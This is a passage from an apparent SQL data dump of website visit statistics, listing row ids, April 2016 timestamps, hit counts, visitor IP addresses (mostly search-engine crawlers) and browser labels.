,1,1,0,0,'180.76.15.7','other'),(32383,1459755828,1,1,0,0,'66.249.64.223','other'),(32384,1459755849,1,0,1,0,'68.180.229.103',''),(32385,1459755886,1,1,0,0,'217.69.133.216','other'),(32386,1459756025,1,1,0,0,'82.145.209.22','opera'),(32387,1459756111,1,1,0,0,'91.124.19.200','chrome'),(32388,1459756174,1,1,0,0,'130.193.50.34','other'),(32389,1459756186,1,1,0,0,'217.69.133.221','other'),(32390,1459756187,1,1,0,0,'217.69.133.224','other'),(32392,1459756188,1,1,0,0,'217.69.133.226','other'),(32393,1459756219,2,0,2,0,'66.249.64.233',''),(32394,1459756241,1,1,0,0,'141.8.132.105','other'),(32395,1459756414,1,1,0,0,'157.55.39.139','other'),(32396,1459756458,1,1,0,0,'164.132.161.83','other'),(32397,1459756527,1,1,0,0,'91.196.178.69','chrome'),(32398,1459756797,1,1,0,0,'91.196.178.69','firefox'),(32399,1459757062,1,1,0,0,'217.69.133.230','other'),(32400,1459757063,1,1,0,0,'217.69.133.229','other'),(32402,1459757475,1,1,0,0,'217.69.133.236','other'),(32403,1459757476,2,2,0,0,'217.69.133.235','other'),(32404,1459757477,1,1,0,0,'217.69.133.70','other'),(32405,1459757698,1,0,1,0,'66.249.64.223',''),(32406,1459757717,1,0,1,0,'66.249.64.228',''),(32407,1459757874,31,31,0,0,'130.193.50.34','other'),(32408,1459757885,1,1,0,0,'91.196.178.69','firefox'),(32409,1459757889,2,2,0,0,'141.8.183.25','other'),(32410,1459757960,5,5,0,0,'141.8.132.105','other'),(32411,1459757963,1,1,0,0,'5.255.253.113','other'),(32412,1459758009,1,1,0,0,'82.145.209.22','opera'),(32413,1459758010,1,1,0,0,'8.29.198.25','other'),(32414,1459758039,3,1,2,0,'66.249.64.223',''),(32415,1459758097,2,2,0,0,'217.69.133.228','other'),(32416,1459758433,1,1,0,0,'217.69.133.225','other'),(32417,1459758571,1,1,0,0,'217.69.133.239','other'),(32418,1459758956,1,1,0,0,'91.196.178.161','chrome'),(32419,1459758992,1,1,0,0,'66.249.64.156','other'),(32420,1459759114,1,0,1,0,'66.249.64.150',''),(32421,1459759524,134,134,0,0,'91.194.84.106','other'),(32422,1459759681,1,1,0,0,'66.249.89.118','other'),(32423,1459759753,2,0,2,0,'66.249.64.233',''),(32424,1459759936,1,1,0,0,'91.196.178.161','chrome'),(32425,1459759979,1,1,0,0,'91.196.177.44','chrome'),(32426,1459760044,1,1,0,0,'85.115.62.180','other'),(32427,1459760150,14,14,0,0,'130.193.50.34','other'),(32428,1459760151,13,13,0,0,'141.8.132.105','other'),(32429,1459760156,2,2,0,0,'141.8.183.25','other'),(32430,1459760204,1,0,1,0,'66.249.64.228',''),(32431,1459760428,166,166,0,0,'91.194.84.106','other'),(32432,1459760801,1,1,0,0,'51.255.65.73','other'),(32433,1459760921,1,1,0,0,'91.196.178.68','firefox'),(32434,1459760941,1,0,1,0,'66.249.64.233',''),(32435,1459760974,178,178,0,0,'149.56.110.178','other'),(32436,1459761010,1,1,0,0,'141.8.142.58','other'),(32437,1459761011,1,1,0,0,'5.255.253.113','other'),(32438,1459761042,1,1,0,0,'94.179.90.7','firefox'),(32439,1459761057,1,1,0,0,'217.69.133.218','other'),(32440,1459761097,4,4,0,0,'178.154.189.202','other'),(32441,1459761165,1,1,0,0,'91.196.178.161','chrome'),(32442,1459761298,1,1,0,0,'91.196.178.161','msie'),(32443,1459761562,1,1,0,0,'91.196.178.135','chrome'),(32444,1459761622,2,2,0,0,'130.193.50.34','other'),(32445,1459761704,1,1,0,0,'217.69.133.215','other'),(32447,1459761705,2,2,0,0,'217.69.133.85','other'),(32448,1459761739,1,1,0,0,'66.249.64.228','other'),(32449,1459761773,1,1,0,0,'91.196.178.70','chrome'),(32450,1459761835,1,1,0,0,'217.69.133.225','other'),(32451,1459761836,1,1,0,0,'217.69.133.220','other'),(32452,1459762605,1,0,1,0,'66.249.64.233',''),(32453,1459762616,1,1,0,0,'141.8.132.105','other'),(32454,1459762739,1,1,0,0,'78.111.189.244','chrome'),(32455,1459762839,1,1,0,0,'91.196.178.70','firefox'),(32456,1459762867,1,1,0,0,'130.193.50.34','other'),(32457,1459762892,1,1,0,0,'217.69.133.228','other'),(32458,1459762893,1,1,0,0,'217.69.133.227','other'),(32459,1459762927,1,1,0,0,'91.196.178.161','chrome'),(32460,1459763171,1,1,0,0,'141.8.183.25','other'),(32461,1459763367,1,0,1,0,'66.249.64.228',''),(32462,1459763428,2,2,0,0,'217.69.133.233','other'),(32463,1459763429,1,1,0,0,'217.69.133.230','other'),(32464,1459763661,1,1,0,0,'217.25.194.195','chrome'),(32465,1459763726,2,2,0,0,'95.134.203.167','opera'),(32466,1459763893,1,1,0,0,'37.54.19.36','firefox'),(32467,1459763965,1,1,0,0,'130.193.51.19','other'),(32468,1459764116,2,2,0,0,'217.69.133.237','other'),(32469,1459764117,1,1,0,0,'217.69.133.240','other'),(32470,1459764182,1,1,0,0,'217.69.133.222','other'),(32472,1459764260,1,1,0,0,'217.69.133.228','other'),(32473,1459764700,1,1,0,0,'217.69.133.231','other'),(32474,1459764864,1,1,0,0,'176.120.60.200','chrome'),(32475,1459764967,1,1,0,0,'130.193.50.34','other'),(32476,1459764977,1,0,1,0,'68.180.231.29',''),(32477,1459765333,2,0,2,0,'66.249.64.228',''),(32478,1459765479,1,0,1,0,'66.249.64.233',''),(32479,1459765820,2,0,2,0,'66.249.64.223',''),(32480,1459765882,1,1,0,0,'91.196.178.161','chrome'),(32481,1459766201,2,2,0,0,'217.69.133.67','other'),(32482,1459766581,1,1,0,0,'130.180.219.4','firefox'),(32483,1459766693,1,1,0,0,'130.193.50.34','other'),(32484,1459766744,1,1,0,0,'91.196.178.131','chrome'),(32485,1459766893,1,1,0,0,'5.175.196.47','firefox'),(32486,1459767127,1,1,0,0,'217.69.133.216','other'),(32487,1459767128,1,1,0,0,'217.69.133.215','other'),(32488,1459767352,1,1,0,0,'217.69.133.224','other'),(32489,1459767371,1,1,0,0,'217.69.133.223','other'),(32490,1459767442,1,1,0,0,'217.69.133.85','other'),(32491,1459767645,1,1,0,0,'91.196.178.35','chrome'),(32492,1459767878,1,1,0,0,'46.201.240.112','chrome'),(32493,1459768037,2,2,0,0,'130.193.50.34','other'),(32494,1459768071,3,1,2,0,'66.249.64.223',''),(32495,1459768167,1,1,0,0,'217.69.133.237','other'),(32497,1459768168,1,1,0,0,'217.69.133.238','other'),(32499,1459768270,1,1,0,0,'95.134.203.167','opera'),(32500,1459768379,1,1,0,0,'91.196.178.70','chrome'),(32501,1459768516,1,0,1,0,'68.180.231.29',''),(32502,1459768695,1,1,0,0,'217.69.136.203','other'),(32503,1459768696,1,1,0,0,'217.69.136.210','other'),(32504,1459768721,1,1,0,0,'217.69.133.229','other'),(32505,1459768723,1,1,0,0,'217.69.133.232','other'),(32506,1459768732,1,1,0,0,'217.69.133.69','other'),(32507,1459768736,1,1,0,0,'180.76.15.141','other'),(32508,1459768775,1,0,1,0,'66.249.64.228',''),(32509,1459768820,1,1,0,0,'8.29.198.25','other'),(32510,1459768864,1,1,0,0,'176.120.60.200','chrome'),(32511,1459769024,3,3,0,0,'130.193.50.34','other'),(32512,1459769124,1,1,0,0,'5.255.253.113','other'),(32513,1459769183,1,1,0,0,'91.196.178.39','chrome'),(32514,1459769194,1,0,1,0,'66.249.64.223',''),(32515,1459769214,1,0,1,0,'66.249.64.156',''),(32516,1459769372,1,1,0,0,'217.69.133.238','other'),(32517,1459769550,1,1,0,0,'157.55.39.103','other'),(32518,1459769780,1,1,0,0,'217.69.133.227','other'),(32519,1459769877,1,1,0,0,'217.69.133.220','other'),(32520,1459769958,4,4,0,0,'89.163.148.58','other'),(32521,1459769985,1,1,0,0,'130.193.50.34','other'),(32522,1459770190,2,0,2,0,'66.249.64.228',''),(32523,1459770218,1,1,0,0,'141.8.183.25','other'),(32524,1459770301,1,1,0,0,'66.249.89.116','other'),(32525,1459770354,1,1,0,0,'213.108.45.170','opera'),(32526,1459770392,1,1,0,0,'217.69.143.47','other'),(32527,1459770476,1,1,0,0,'5.255.253.113','other'),(32528,1459770505,1,0,1,0,'66.249.64.223',''),(32529,1459770562,1,1,0,0,'217.69.133.69','other'),(32530,1459770683,1,1,0,0,'78.46.50.246','other'),(32531,1459770922,1,1,0,0,'176.120.60.200','chrome'),(32532,1459771114,1,1,0,0,'217.69.133.226','other'),(32533,1459771989,1,1,0,0,'5.255.253.113','other'),(32534,1459772072,1,0,1,0,'68.180.231.29',''),(32535,1459772076,1,1,0,0,'217.69.133.67','other'),(32536,1459772349,3,0,3,0,'66.249.64.233',''),(32537,1459772580,1,1,0,0,'217.69.133.85','other'),(32538,1459772679,21,0,21,0,'66.249.64.223',''),(32539,1459772765,1,0,1,0,'66.249.64.156',''),(32540,1459772966,2,0,2,0,'66.249.64.228',''),(32541,1459772997,1,1,0,0,'130.180.208.124','chrome'),(32542,1459773009,1,1,0,0,'37.53.90.175','chrome'),(32543,1459773256,1,1,0,0,'217.69.136.207','other'),(32544,1459773336,1,1,0,0,'91.124.63.148','chrome'),(32545,1459773559,1,1,0,0,'141.8.183.25','other'),(32546,1459773600,5,0,5,0,'66.249.64.223',''),(32547,1459773613,1,1,0,0,'141.8.132.105','other'),(32548,1459773843,1,1,0,0,'91.216.22.236','chrome'),(32549,1459773918,1,1,0,0,'217.69.133.233','other'),(32550,1459773919,1,1,0,0,'217.69.133.69','other'),(32551,1459773930,1,1,0,0,'217.69.133.235','other'),(32552,1459774420,1,1,0,0,'217.69.133.221','other'),(32554,1459774421,1,1,0,0,'217.69.133.68','other'),(32555,1459774459,1,1,0,0,'212.111.196.35','chrome'),(32556,1459774539,1,1,0,0,'130.193.51.83','other'),(32557,1459774583,1,1,0,0,'207.46.13.17','other'),(32558,1459774634,3,0,3,0,'66.249.64.233',''),(32559,1459774657,2,0,2,0,'66.249.64.223',''),(32560,1459774761,1,1,0,0,'178.94.34.32','msie'),(32561,1459774918,2,2,0,0,'217.69.133.230','other'),(32563,1459774959,1,1,0,0,'91.196.178.69','firefox'),(32564,1459775124,1,1,0,0,'91.196.178.69','chrome'),(32565,1459775125,2,0,2,0,'66.249.64.228',''),(32566,1459775173,1,1,0,0,'37.52.23.53','chrome'),(32567,1459775296,1,1,0,0,'54.244.48.20','msie'),(32568,1459775372,1,1,0,0,'217.69.133.224','other'),(32570,1459775450,2,2,0,0,'130.193.50.34','other'),(32571,1459775465,1,1,0,0,'151.80.31.181','other'),(32572,1459775555,1,1,0,0,'51.254.143.240','other'),(32573,1459775601,1,1,0,0,'195.211.175.12','chrome'),(32574,1459775908,1,1,0,0,'95.135.6.106','firefox'),(32575,1459776086,1,1,0,0,'141.8.183.25','other'),(32576,1459776103,1,1,0,0,'51.255.65.47','other'),(32577,1459776173,1,1,0,0,'37.52.23.53','chrome'),(32578,1459776179,3,0,3,0,'68.180.231.29',''),(32579,1459776343,1,1,0,0,'217.69.133.228','other'),(32580,1459776359,1,1,0,0,'51.255.65.63','other'),(32581,1459776577,1,1,0,0,'66.249.93.124','chrome'),(32582,1459777049,1,1,0,0,'217.69.133.85','other'),(32583,1459777050,1,1,0,0,'217.69.133.67','other'),(32584,1459777096,1,0,1,0,'68.180.231.29',''),(32585,1459777304,1,1,0,0,'69.30.218.202','other'),(32586,1459777515,1,1,0,0,'5.255.253.113','other'),(32587,1459777796,1,1,0,0,'180.76.15.31','other'),(32588,1459777866,2,0,2,0,'66.249.64.228',''),(32589,1459778111,1,1,0,0,'217.69.133.215','other'),(32590,1459778194,1,1,0,0,'91.196.178.69','firefox'),(32591,1459778217,2,0,2,0,'68.180.231.29',''),(32592,1459778484,1,1,0,0,'217.69.133.221','other'),(32593,1459778485,1,1,0,0,'217.69.133.226','other'),(32594,1459778596,3,3,0,0,'130.193.50.34','other'),(32595,1459778611,1,1,0,0,'141.0.15.210','opera'),(32596,1459778929,1,0,1,0,'66.249.64.223',''),(32597,1459778989,1,1,0,0,'91.196.178.133','other'),(32598,1459779079,1,1,0,0,'217.69.133.215','other'),(32599,1459779080,1,1,0,0,'217.69.133.218','other'),(32600,1459779082,1,1,0,0,'217.69.133.85','other'),(32601,1459779254,1,0,1,0,'66.249.64.162',''),(32602,1459779256,1,1,0,0,'91.196.178.169','opera'),(32603,1459779293,1,1,0,0,'180.76.15.12','other'),(32604,1459779363,1,1,0,0,'141.8.132.83','other'),(32605,1459779370,1,1,0,0,'130.193.50.4','other'),(32606,1459779373,1,1,0,0,'141.8.142.62','other'),(32607,1459779608,1,1,0,0,'91.196.178.70','chrome'),(32608,1459779661,1,1,0,0,'8.29.198.25','other'),(32609,1459779912,2,2,0,0,'37.53.90.175','chrome'),(32610,1459780143,1,0,1,0,'68.180.231.29',''),(32611,1459780342,1,1,0,0,'217.69.133.69','other'),(32612,1459780753,1,1,0,0,'217.69.133.70','other'),(32613,1459780818,1,1,0,0,'151.80.31.107','other'),(32614,1459780850,1,1,0,0,'130.193.37.7','other'),(32615,1459781066,1,1,0,0,'66.249.64.223','other'),(32616,1459781181,1,1,0,0,'66.249.89.114','other'),(32617,1459781656,2,0,2,0,'66.249.64.228',''),(32618,1459781732,1,1,0,0,'94.23.19.178','other'),(32619,1459781900,1,1,0,0,'217.69.133.232','other'),(32620,1459781901,1,1,0,0,'217.69.133.228','other'),(32622,1459781902,2,2,0,0,'217.69.133.231','other'),(32623,1459782235,1,1,0,0,'51.255.65.96','other'),(32624,1459782454,1,1,0,0,'217.69.133.225','other'),(32626,1459782483,1,1,0,0,'141.0.14.6','opera'),(32627,1459782509,1,1,0,0,'62.210.215.100','chrome'),(32628,1459783159,1,1,0,0,'157.55.39.34','other'),(32629,1459783417,1,1,0,0,'66.249.64.150','other'),(32630,1459783930,1,1,0,0,'94.179.1.38','firefox'),(32631,1459783932,2,2,0,0,'217.69.133.219','other'),(32632,1459784048,1,1,0,0,'66.249.93.67','chrome'),(32633,1459784144,2,2,0,0,'217.69.133.215','other'),(32634,1459784145,1,1,0,0,'217.69.133.67','other'),(32635,1459784330,1,1,0,0,'130.193.50.34','other'),(32636,1459784485,3,0,3,0,'68.180.231.29',''),(32637,1459784520,2,2,0,0,'217.69.133.224','other'),(32638,1459784632,1,1,0,0,'217.69.133.84','other'),(32639,1459784633,2,2,0,0,'217.69.133.85','other'),(32640,1459784770,1,1,0,0,'141.0.14.6','opera'),(32641,1459784796,3,0,3,0,'66.249.64.223',''),(32642,1459784798,2,0,2,0,'66.249.64.233',''),(32643,1459785517,1,0,1,0,'68.180.231.29',''),(32644,1459785537,1,1,0,0,'217.69.133.69','other'),(32645,1459785744,1,1,0,0,'217.69.133.222','other'),(32646,1459785745,1,1,0,0,'217.69.133.68','other'),(32647,1459786025,1,1,0,0,'217.69.133.236','other'),(32648,1459786295,1,1,0,0,'217.69.133.233','other'),(32649,1459786573,1,1,0,0,'141.0.14.6','opera'),(32650,1459786640,1,1,0,0,'151.80.31.108','other'),(32651,1459786656,1,1,0,0,'141.8.142.10','other'),(32652,1459786669,1,1,0,0,'141.8.132.97','other'),(32653,1459786855,1,0,1,0,'66.249.64.228',''),(32654,1459786861,1,1,0,0,'5.255.253.9','other'),(32655,1459786987,1,0,1,0,'66.249.64.233',''),(32656,1459787118,2,2,0,0,'217.69.133.227','other'),(32658,1459787123,1,1,0,0,'217.69.133.225','other'),(32659,1459787556,1,1,0,0,'82.145.217.251','other'),(32660,1459787659,1,1,0,0,'217.69.133.233','other'),(32661,1459787966,1,1,0,0,'207.46.13.27','other'),(32662,1459788209,1,1,0,0,'217.69.133.226','other'),(32663,1459788627,1,1,0,0,'164.132.161.57','other'),(32664,1459788713,1,1,0,0,'82.145.211.138','opera'),(32665,1459788771,1,0,1,0,'66.249.64.223',''),(32666,1459788872,1,1,0,0,'178.94.201.144','chrome'),(32667,1459788946,2,2,0,0,'217.69.133.219','other'),(32668,1459788990,1,1,0,0,'141.8.142.67','other'),(32669,1459789159,2,1,1,0,'66.249.64.223',''),(32670,1459789180,1,1,0,0,'164.132.161.24','other'),(32671,1459789477,1,0,1,0,'68.180.231.29',''),(32672,1459789486,1,1,0,0,'217.69.133.215','other'),(32673,1459789487,1,1,0,0,'217.69.133.218','other'),(32674,1459789536,1,1,0,0,'141.8.142.62','other'),(32675,1459789539,1,1,0,0,'141.8.132.30','other'),(32676,1459789681,1,1,0,0,'180.76.15.139','other'),(32677,1459789682,1,1,0,0,'180.76.15.152','other'),(32678,1459789780,1,1,0,0,'217.69.133.67','other'),(32679,1459789895,1,1,0,0,'217.69.133.222','other'),(32680,1459790148,1,1,0,0,'151.80.31.183','other'),(32681,1459790150,1,1,0,0,'141.8.132.83','other'),(32682,1459790156,2,0,2,0,'66.249.64.228',''),(32683,1459790484,1,0,1,0,'66.249.64.233',''),(32684,1459790503,1,1,0,0,'8.29.198.26','other'),(32685,1459790593,1,1,0,0,'141.8.132.41','other'),(32686,1459790670,1,0,1,0,'66.249.64.223',''),(32687,1459790916,2,2,0,0,'217.69.133.69','other'),(32688,1459791106,1,0,1,0,'66.249.64.106',''),(32689,1459791180,1,1,0,0,'93.158.152.84','other'),(32690,1459791204,1,1,0,0,'5.255.253.67','other'),(32691,1459791279,1,1,0,0,'130.193.51.14','other'),(32692,1459791357,1,1,0,0,'164.132.161.89','other'),(32693,1459791411,1,1,0,0,'66.249.89.114','other'),(32694,1459791453,1,0,1,0,'66.249.64.162',''),(32695,1459791479,1,1,0,0,'82.145.211.138','opera'),(32696,1459791586,1,0,1,0,'66.249.64.223',''),(32697,1459791629,1,1,0,0,'217.69.133.231','other'),(32698,1459791811,1,1,0,0,'217.69.133.235','other'),(32699,1459791812,1,1,0,0,'217.69.133.237','other'),(32700,1459791874,2,0,2,0,'66.249.64.233',''),(32701,1459791979,1,1,0,0,'207.241.237.211','other'),(32702,1459792149,1,1,0,0,'130.193.37.21','other'),(32703,1459792173,1,1,0,0,'217.69.133.222','other'),(32704,1459792174,1,1,0,0,'217.69.133.68','other'),(32705,1459792177,1,1,0,0,'66.249.64.96','other'),(32706,1459792224,3,1,2,0,'66.249.64.228',''),(32707,1459792271,1,0,1,0,'68.180.229.103',''),(32708,1459792396,1,1,0,0,'217.69.133.228','other'),(32709,1459792397,1,1,0,0,'217.69.133.229','other'),(32710,1459792566,1,1,0,0,'66.249.64.101','other'),(32711,1459792598,1,1,0,0,'180.76.15.135','other'),(32712,1459792624,2,1,1,0,'66.249.64.228',''),(32713,1459792679,4,0,4,0,'66.249.64.223',''),(32714,1459792719,1,1,0,0,'141.8.132.83','other'),(32715,1459792806,1,1,0,0,'207.46.13.27','other'),(32716,1459792812,1,1,0,0,'141.8.142.58','other'),(32717,1459793245,1,1,0,0,'217.69.133.230','other'),(32718,1459793340,1,1,0,0,'82.145.211.138','opera'),(32719,1459793683,1,1,0,0,'141.8.142.67','other'),(32720,1459793741,1,1,0,0,'217.69.133.68','other'),(32721,1459793759,2,2,0,0,'130.193.51.14','other'),(32722,1459793762,1,1,0,0,'141.8.132.52','other'),(32723,1459793852,1,0,1,0,'66.249.64.228',''),(32724,1459794011,1,0,1,0,'66.249.64.223',''),(32725,1459794044,1,1,0,0,'178.92.250.224','chrome'),(32726,1459794452,1,1,0,0,'130.193.37.21','other'),(32727,1459794462,1,1,0,0,'130.193.51.43','other'),(32728,1459794701,1,1,0,0,'217.69.133.219','other'),(32729,1459794960,1,1,0,0,'109.173.125.227','chrome'),(32730,1459795064,1,1,0,0,'217.69.133.216','other'),(32731,1459795080,1,1,0,0,'178.154.149.10','other'),(32732,1459795118,1,0,1,0,'66.249.64.223',''),(32733,1459795190,1,1,0,0,'82.145.211.138','opera'),(32734,1459795486,1,1,0,0,'141.8.132.10','other'),(32735,1459795673,1,1,0,0,'130.193.51.83','other'),(32736,1459795675,1,1,0,0,'164.132.161.97','other'),(32737,1459795699,1,1,0,0,'141.8.132.2','other'),(32738,1459795789,1,1,0,0,'217.69.133.215','other'),(32739,1459795790,1,1,0,0,'217.69.133.218','other'),(32740,1459795791,1,1,0,0,'217.69.133.67','other'),(32741,1459795891,1,1,0,0,'207.46.13.108','other'),(32742,1459795941,1,1,0,0,'94.22.47.242','other'),(32743,1459795961,1,0,1,0,'66.249.64.233',''),(32744,1459795996,1,0,1,0,'68.180.229.103',''),(32745,1459796110,1,1,0,0,'217.69.133.217','other'),(32746,1459796326,1,1,0,0,'141.8.132.105','other'),(32747,1459796669,1,1,0,0,'217.69.136.210','other'),(32748,1459796673,1,1,0,0,'217.69.133.232','other'),(32750,1459796674,1,1,0,0,'217.69.133.228','other'),(32752,1459796781,2,0,2,0,'68.180.231.29',''),(32753,1459796986,1,1,0,0,'141.8.142.61','other'),(32754,1459796989,1,1,0,0,'141.8.183.25','other'),(32755,1459797049,1,1,0,0,'130.193.51.19','other'),(32756,1459797091,1,1,0,0,'130.193.50.34','other'),(32757,1459797707,1,1,0,0,'207.46.13.27','other'),(32758,1459797951,1,0,1,0,'68.180.231.29',''),(32759,1459798123,3,3,0,0,'130.193.50.34','other'),(32760,1459798417,1,1,0,0,'195.10.210.49','chrome'),(32761,1459798671,1,1,0,0,'217.69.133.229','other'),(32762,1459798820,1,1,0,0,'52.37.182.12','opera'),(32763,1459799236,1,1,0,0,'217.69.133.68','other'),(32764,1459799661,1,0,1,0,'66.249.64.233',''),(32765,1459799680,1,1,0,0,'141.8.142.58','other'),(32766,1459799944,1,0,1,0,'66.249.64.223',''),(32767,1459799964,1,1,0,0,'130.193.50.34','other'),(32768,1459800083,2,0,2,0,'68.180.231.29',''),(32769,1459800113,3,0,3,0,'66.249.64.228',''),(32770,1459800602,1,0,1,0,'66.249.64.150',''),(32771,1459800634,1,1,0,0,'217.69.133.67','other'),(32772,1459800635,1,1,0,0,'217.69.133.85','other'),(32773,1459800636,2,2,0,0,'217.69.133.84','other'),(32774,1459800968,1,1,0,0,'217.69.133.240','other'),(32775,1459801005,1,1,0,0,'95.237.125.58','chrome'),(32776,1459801039,1,1,0,0,'217.69.133.217','other'),(32777,1459801081,2,0,2,0,'66.249.64.223',''),(32778,1459801257,1,1,0,0,'50.118.162.186','chrome'),(32779,1459801369,1,1,0,0,'8.29.198.26','other'),(32780,1459801721,2,0,2,0,'66.249.64.228',''),(32781,1459801866,1,1,0,0,'217.69.133.218','other'),(32782,1459801867,1,1,0,0,'217.69.133.216','other'),(32783,1459802331,1,1,0,0,'66.249.89.118','other'),(32784,1459802508,1,1,0,0,'40.77.167.49','other'),(32785,1459802759,1,1,0,0,'217.69.133.221','other'),(32786,1459802919,1,1,0,0,'217.69.133.233','other'),(32788,1459802920,2,2,0,0,'217.69.133.230','other'),(32789,1459802963,2,0,2,0,'68.180.231.29',''),(32790,1459803131,1,1,0,0,'151.80.31.158','other'),(32791,1459803139,1,0,1,0,'66.249.64.223',''),(32792,1459803518,1,1,0,0,'217.69.133.223','other'),(32793,1459803519,1,1,0,0,'217.69.133.68','other'),(32794,1459803659,1,1,0,0,'217.69.133.227','other'),(32795,1459803661,1,1,0,0,'217.69.133.229','other'),(32796,1459804032,1,0,1,0,'66.249.64.162',''),(32797,1459804321,1,1,0,0,'164.132.161.30','other'),(32798,1459804347,1,0,1,0,'66.249.64.233',''),(32799,1459804766,2,2,0,0,'217.69.133.221','other'),(32800,1459804769,1,1,0,0,'217.69.133.68','other'),(32801,1459804857,1,1,0,0,'185.26.182.35','opera'),(32802,1459804864,1,1,0,0,'91.196.177.69','chrome'),(32803,1459804918,4,4,0,0,'130.193.50.34','other'),(32804,1459804950,1,1,0,0,'180.76.15.14','other'),(32805,1459805750,2,2,0,0,'217.69.133.219','other'),(32806,1459805763,1,1,0,0,'185.26.182.35','opera'),(32807,1459805973,1,1,0,0,'51.255.65.88','other'),(32808,1459806138,1,0,1,0,'66.249.64.101',''),(32809,1459806226,1,0,1,0,'66.249.64.90',''),(32810,1459806240,1,1,0,0,'40.77.167.49','other'),(32811,1459806625,1,1,0,0,'217.69.133.84','other'),(32812,1459806626,1,1,0,0,'217.69.133.215','other'),(32813,1459806677,1,0,1,0,'66.249.64.96',''),(32814,1459806882,1,1,0,0,'141.8.132.105','other'),(32815,1459806885,1,1,0,0,'141.8.183.25','other'),(32816,1459806887,2,2,0,0,'130.193.50.34','other'),(32817,1459806979,1,1,0,0,'185.26.182.35','opera'),(32818,1459807333,1,0,1,0,'68.180.231.29',''),(32819,1459807420,1,1,0,0,'5.255.253.113','other'),(32820,1459807596,1,0,1,0,'66.249.64.101',''),(32821,1459807665,2,1,1,0,'66.249.64.228',''),(32822,1459807667,4,4,0,0,'163.172.13.244','other'),(32823,1459807951,2,0,2,0,'66.249.64.96',''),(32824,1459807969,3,3,0,0,'207.46.13.27','other'),(32825,1459807989,1,1,0,0,'141.8.142.58','other'),(32826,1459807991,1,1,0,0,'130.193.51.83','other'),(32827,1459808058,1,0,1,0,'66.249.64.223',''),(32828,1459808503,1,1,0,0,'151.80.31.165','other'),(32829,1459808563,2,2,0,0,'130.193.50.34','other'),(32830,1459808724,1,1,0,0,'66.249.64.101','other'),(32831,1459808912,1,1,0,0,'217.69.133.232','other'),(32832,1459808913,1,1,0,0,'217.69.133.228','other'),(32834,1459808962,3,1,2,0,'66.249.64.223',''),(32835,1459809077,2,2,0,0,'130.193.51.19','other'),(32836,1459809083,1,1,0,0,'5.255.253.113','other'),(32837,1459809119,1,0,1,0,'66.249.64.228',''),(32838,1459809135,2,2,0,0,'141.8.132.105','other'),(32839,1459809138,1,1,0,0,'141.8.183.25','other'),(32840,1459809360,4,0,4,0,'68.180.231.29',''),(32841,1459809621,1,1,0,0,'66.249.64.85','other'),(32842,1459809922,2,2,0,0,'130.193.50.34','other'),(32843,1459809925,1,1,0,0,'130.193.51.83','other'),(32844,1459810044,20,20,0,0,'51.254.97.218','other'),(32845,1459810225,2,2,0,0,'109.173.125.227','firefox'),(32846,1459810285,1,0,1,0,'66.249.64.223',''),(32847,1459810370,1,1,0,0,'217.69.133.229','other'),(32848,1459810652,1,1,0,0,'141.8.132.105','other'),(32849,1459810658,1,1,0,0,'5.255.253.113','other'),(32850,1459810822,1,1,0,0,'180.76.15.24','other'),(32851,1459810865,2,2,0,0,'217.69.133.68','other'),(32852,1459810867,1,1,0,0,'217.69.133.223','other'),(32853,1459810868,1,1,0,0,'217.69.133.222','other'),(32854,1459810921,1,1,0,0,'51.255.65.94','other'),(32855,1459811122,1,1,0,0,'66.249.64.150','other'),(32856,1459811205,2,0,2,0,'66.249.64.228',''),(32857,1459811279,2,0,2,0,'66.249.64.233',''),(32858,1459811361,1,1,0,0,'217.69.133.215','other'),(32860,1459811362,1,1,0,0,'217.69.133.218','other'),(32861,1459811424,2,2,0,0,'141.8.183.25','other'),(32862,1459811443,1,0,1,0,'66.249.64.162',''),(32863,1459811473,1,1,0,0,'207.46.13.27','other'),(32864,1459811583,1,0,1,0,'68.180.229.103',''),(32865,1459811728,1,1,0,0,'217.69.133.217','other'),(32866,1459811946,1,1,0,0,'217.69.133.238','other'),(32867,1459812002,2,0,2,0,'68.180.231.29',''),(32868,1459812171,1,1,0,0,'130.193.50.34','other'),(32869,1459812174,1,1,0,0,'141.8.132.105','other'),(32870,1459812220,1,1,0,0,'8.29.198.26','other'),(32871,1459812263,1,1,0,0,'207.46.13.123','other'),(32872,1459812285,1,1,0,0,'182.118.25.217','msie'),(32873,1459812450,1,1,0,0,'130.193.51.19','other'),(32874,1459812568,1,1,0,0,'217.69.133.219','other'),(32875,1459812710,2,1,1,0,'66.249.64.223',''),(32876,1459812714,1,1,0,0,'151.80.31.167','other'),(32877,1459812992,3,0,3,0,'68.180.231.29',''),(32878,1459813241,1,1,0,0,'66.249.89.118','other'),(32879,1459813269,1,1,0,0,'141.8.142.67','other'),(32880,1459813464,1,1,0,0,'51.255.65.27','other'),(32881,1459813842,1,1,0,0,'217.69.133.227','other'),(32882,1459813843,1,1,0,0,'5.255.253.113','other'),(32884,1459813906,1,1,0,0,'212.47.227.72','chrome'),(32885,1459813949,1,1,0,0,'217.69.133.236','other'),(32887,1459814000,1,1,0,0,'109.163.234.7','chrome'),(32888,1459814325,3,0,3,0,'66.249.64.223',''),(32889,1459814436,1,1,0,0,'217.69.133.232','other'),(32890,1459814437,1,1,0,0,'217.69.133.233','other'),(32891,1459814467,1,1,0,0,'130.193.50.34','other'),(32892,1459814598,2,0,2,0,'66.249.64.228',''),(32893,1459814701,2,2,0,0,'217.69.133.221','other'),(32894,1459814702,1,1,0,0,'217.69.133.226','other'),(32895,1459814832,1,1,0,0,'151.80.31.107','other'),(32896,1459815001,1,1,0,0,'164.132.161.57','other'),(32897,1459815104,2,2,0,0,'217.69.133.231','other'),(32899,1459815252,1,0,1,0,'66.249.64.223',''),(32900,1459815313,1,1,0,0,'130.193.51.19','other'),(32901,1459815317,1,1,0,0,'141.8.132.105','other'),(32902,1459815790,1,1,0,0,'217.69.133.69','other'),(32903,1459816232,1,1,0,0,'5.255.253.113','other'),(32904,1459816235,1,1,0,0,'217.69.133.226','other'),(32905,1459816237,1,1,0,0,'217.69.133.223','other'),(32906,1459816520,1,1,0,0,'51.255.65.56','other'),(32907,1459816802,1,1,0,0,'178.154.189.202','other'),(32908,1459817102,4,4,0,0,'130.193.50.34','other'),(32909,1459817169,48,48,0,0,'144.76.93.46','other'),(32910,1459817191,1,1,0,0,'178.154.189.203','other'),(32911,1459817214,3,2,1,0,'66.249.64.228',''),(32912,1459817378,2,2,0,0,'178.63.86.11','other'),(32913,1459817420,2,2,0,0,'217.69.133.219','other'),(32914,1459817434,1,0,1,0,'66.249.64.223',''),(32915,1459817561,1,1,0,0,'207.46.13.27','other'),(32916,1459817778,1,1,0,0,'217.69.133.235','other'),(32917,1459817887,1,1,0,0,'141.8.132.105','other'),(32918,1459817939,4,